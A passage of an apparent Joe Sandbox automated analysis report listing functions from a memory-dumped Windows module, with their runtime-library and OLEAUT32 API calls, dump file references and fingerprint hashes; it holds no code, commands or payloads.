                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throw$_mallocstd::exception::exception
                                                                                                          • String ID: 0Bo$ILProtector$lQo
                                                                                                          • API String ID: 84431791-2290274553
                                                                                                          • Opcode ID: d5f3e6ad19bcc6fa8dfee425b122f7232fb5ff9d789befcd609c59c8663543a9
                                                                                                          • Instruction ID: 46fc73167139b8f508b6ae5d9c4e88fe56f0f5a2a8641086b5fd4cd2e6928204
                                                                                                          • Opcode Fuzzy Hash: d5f3e6ad19bcc6fa8dfee425b122f7232fb5ff9d789befcd609c59c8663543a9
                                                                                                          • Instruction Fuzzy Hash: 2C711775905659DFCB15CFA8C984BEEBBB4FF49304F1081AAE419A7380DB706A44CFA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F058D80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _malloc.LIBCMT ref: 6F058D8A
                                                                                                            • Part of subcall function 6F089D66: __FF_MSGBANNER.LIBCMT ref: 6F089D7F
                                                                                                            • Part of subcall function 6F089D66: __NMSG_WRITE.LIBCMT ref: 6F089D86
                                                                                                            • Part of subcall function 6F089D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6F089BD4,6F021290,F6D10407), ref: 6F089DAB
                                                                                                            • Part of subcall function 6F0891F6: std::_Lockit::_Lockit.LIBCPMT ref: 6F089202
                                                                                                          • _malloc.LIBCMT ref: 6F058DAF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F058DD4
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F058DEB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _malloc$AllocateException@8HeapLockitLockit::_Throwstd::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 3043633502-2241063504
                                                                                                          • Opcode ID: d812b02400c7766fc508a30144f8787a41c330f51df8ab0199152481fb8fddfd
                                                                                                          • Instruction ID: f4080616dab4256e5ab6ce780b89aa44a837e39ece3f18df93128264384e522f
                                                                                                          • Opcode Fuzzy Hash: d812b02400c7766fc508a30144f8787a41c330f51df8ab0199152481fb8fddfd
                                                                                                          • Instruction Fuzzy Hash: 16F0F07640831167DB11FB959D41B9F37E8AFA1B14F80081CFD6593185EB62A21CC6F3
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F089BB5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _malloc.LIBCMT ref: 6F089BCF
                                                                                                            • Part of subcall function 6F089D66: __FF_MSGBANNER.LIBCMT ref: 6F089D7F
                                                                                                            • Part of subcall function 6F089D66: __NMSG_WRITE.LIBCMT ref: 6F089D86
                                                                                                            • Part of subcall function 6F089D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6F089BD4,6F021290,F6D10407), ref: 6F089DAB
                                                                                                          • std::exception::exception.LIBCMT ref: 6F089C04
                                                                                                          • std::exception::exception.LIBCMT ref: 6F089C1E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F089C2F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 615853336-2241063504
                                                                                                          • Opcode ID: 3741b8778f455d4d86d80acb3f74c4183f8221eda98f491f9564e32bbbda33ce
                                                                                                          • Instruction ID: 8d0b9df34d46b3e9da647ff5c0f489fc511e5d4163af90ddd8907b3b8efaa6fa
                                                                                                          • Opcode Fuzzy Hash: 3741b8778f455d4d86d80acb3f74c4183f8221eda98f491f9564e32bbbda33ce
                                                                                                          • Instruction Fuzzy Hash: E7F0AF75500A0DEBDF14FBA4CD14B9D7BF8AB42B28F500559E821A71D9DF729A00D790
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F043C10 Relevance: 7.7, APIs: 5, Instructions: 186COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayGetElement.OLEAUT32(?,?,F6D10407), ref: 6F043C49
                                                                                                          • VariantInit.OLEAUT32(?), ref: 6F043C81
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F043D26
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F043D30
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F043D89
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$Clear$ArrayElementInitSafe
                                                                                                          • String ID:
                                                                                                          • API String ID: 4110538090-0
                                                                                                          • Opcode ID: db2e019d73e89a5fa07f870659ce4ce0508ead9bfb7c444648d1785a1723215c
                                                                                                          • Instruction ID: 7fb1004c1a8000fe7e80c0a196281201fdba85baf0ca75ab09fdc2fe5442dedd
                                                                                                          • Opcode Fuzzy Hash: db2e019d73e89a5fa07f870659ce4ce0508ead9bfb7c444648d1785a1723215c
                                                                                                          • Instruction Fuzzy Hash: DD617C76A00249EFCB00DFA8C981AEEB7B5FF49310F2485AAE515AB350C731AD05DB90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F03DB30 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32(6F0431EC), ref: 6F03DB5E
                                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6F03DB6E
                                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F03DB82
                                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6F03DBF1
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F03DBFB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArraySafe$Variant$ClearCreateDestroyElementInitVector
                                                                                                          • String ID:
                                                                                                          • API String ID: 182531043-0
                                                                                                          • Opcode ID: b03583e192b5c5cc67151c7035a67d3971227663e5437c696d661b9ebdf9d76c
                                                                                                          • Instruction ID: ed326719cfd000cb9c2f1caf277a6286898319eb19f05210057f038be97ed995
                                                                                                          • Opcode Fuzzy Hash: b03583e192b5c5cc67151c7035a67d3971227663e5437c696d661b9ebdf9d76c
                                                                                                          • Instruction Fuzzy Hash: 8B318E7AA01609EFD701DF54C844EEEB7F9FF8A720F11815AE911AB350D735A801DBA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F025450 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 257COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::tr1::_Xweak.LIBCPMT ref: 6F0256D7
                                                                                                          • std::exception::exception.LIBCMT ref: 6F025734
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F02574B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8ThrowXweak_mallocstd::exception::exceptionstd::tr1::_
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2092180293-2241063504
                                                                                                          • Opcode ID: 4b4e3bb3832b0b573778594913dd2321a061c8650f5e604ebafcc0dd3c8fea1a
                                                                                                          • Instruction ID: b86a22d7b94fd2e19bbddd0edcfba529b0777cc1640750ec232770e08da02b40
                                                                                                          • Opcode Fuzzy Hash: 4b4e3bb3832b0b573778594913dd2321a061c8650f5e604ebafcc0dd3c8fea1a
                                                                                                          • Instruction Fuzzy Hash: 82A10975504705CFC724CF28C480A6AB7F6FF88614F548F5EE49A8B694E770EA48CB91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F08A42D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: T@12
                                                                                                          • String ID: a0
                                                                                                          • API String ID: 456891419-3188653782
                                                                                                          • Opcode ID: 9d2de8ce1b2f94236b5b9e5b654449502e7d40e10910088c9a5f139e666d1894
                                                                                                          • Instruction ID: 9e14b85d7b6472fac009b9b221c641e848a0dd5b226eeafa217eca31790a8c2c
                                                                                                          • Opcode Fuzzy Hash: 9d2de8ce1b2f94236b5b9e5b654449502e7d40e10910088c9a5f139e666d1894
                                                                                                          • Instruction Fuzzy Hash: 5711ED70D01656BADF309AB64C48FAFABFCAFC1754F20A415E435A75C1D628E541CA60
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F04C410 Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6F04C478
                                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F04C488
                                                                                                          • SafeArrayGetElement.OLEAUT32(?,00000001,?), ref: 6F04C4B4
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04C512
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArraySafe$Bound$DestroyElement
                                                                                                          • String ID:
                                                                                                          • API String ID: 3987547017-0
                                                                                                          • Opcode ID: 04fd27d389956e06ebeb6aed501b7f6c1a4f25c9f0d80793b7f5021f98bc668d
                                                                                                          • Instruction ID: 70ab2ced2454d9236c5264a6cf41f579f47ad8684ff109105c86178d46cc1440
                                                                                                          • Opcode Fuzzy Hash: 04fd27d389956e06ebeb6aed501b7f6c1a4f25c9f0d80793b7f5021f98bc668d
                                                                                                          • Instruction Fuzzy Hash: A8412E75A0054AEFDB00DF98C980EAEB7B8FB49354F10C569F919E7250D730AA45CB60
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F036C60 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayCreateVector.OLEAUT32(00000011,00000000,00000000), ref: 6F036C73
                                                                                                          • SafeArrayAccessData.OLEAUT32(00000000,6F036C3C), ref: 6F036C87
                                                                                                          • _memmove.LIBCMT ref: 6F036C9A
                                                                                                          • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6F036CA3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArraySafe$Data$AccessCreateUnaccessVector_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 3147195435-0
                                                                                                          • Opcode ID: d0c469f43dcacd07d04ea823be0f2427cade93b3ccf6deb9869ed8c4576532f9
                                                                                                          • Instruction ID: 5538d7ed409c10eea7e5bfe198a7c68c6c418dee895293ef40e644405b7631ee
                                                                                                          • Opcode Fuzzy Hash: d0c469f43dcacd07d04ea823be0f2427cade93b3ccf6deb9869ed8c4576532f9
                                                                                                          • Instruction Fuzzy Hash: DDF05E7A210628BBEB115F91DC89F9B7BACEF87760F018015FA188A241E771D5109BA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F053EB0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 242COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F054042
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F054059
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                            • Part of subcall function 6F089BB5: std::exception::exception.LIBCMT ref: 6F089C04
                                                                                                            • Part of subcall function 6F089BB5: std::exception::exception.LIBCMT ref: 6F089C1E
                                                                                                            • Part of subcall function 6F089BB5: __CxxThrowException@8.LIBCMT ref: 6F089C2F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: std::exception::exception$Exception@8Throw$Copy_strExceptionRaise_mallocstd::exception::_
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2813683038-2241063504
                                                                                                          • Opcode ID: e24398faf49d63905d2060fc331811ac5cef8786c2ba691c8c21a2a1415e7b46
                                                                                                          • Instruction ID: 767e80de0f31c23878e2443a31249a41b48f6a82825cafdd328846546dc944f6
                                                                                                          • Opcode Fuzzy Hash: e24398faf49d63905d2060fc331811ac5cef8786c2ba691c8c21a2a1415e7b46
                                                                                                          • Instruction Fuzzy Hash: 5091B1B19083049FDB00DF69C941B9EFBF8FF85744F14896AE4189B2A0E3B5D5148B92
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0362C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 149COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F036466
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F03647D
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: 6d1faeaa8540c5cca3e7da226e2172fca6a41f4004437c756e31bd2995f7fbc9
                                                                                                          • Instruction ID: a7190f6cec635438f779509ef503a14ae17e6406e7ae1a743fb72ca41b121355
                                                                                                          • Opcode Fuzzy Hash: 6d1faeaa8540c5cca3e7da226e2172fca6a41f4004437c756e31bd2995f7fbc9
                                                                                                          • Instruction Fuzzy Hash: E15179B28083519FD710CF68CA81B5ABBE4FB86750F40492EF9998B390D771E904CB93
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F04D2E0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F04D3E8
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F04D3FF
                                                                                                          Strings
                                                                                                          Memory Dump Source
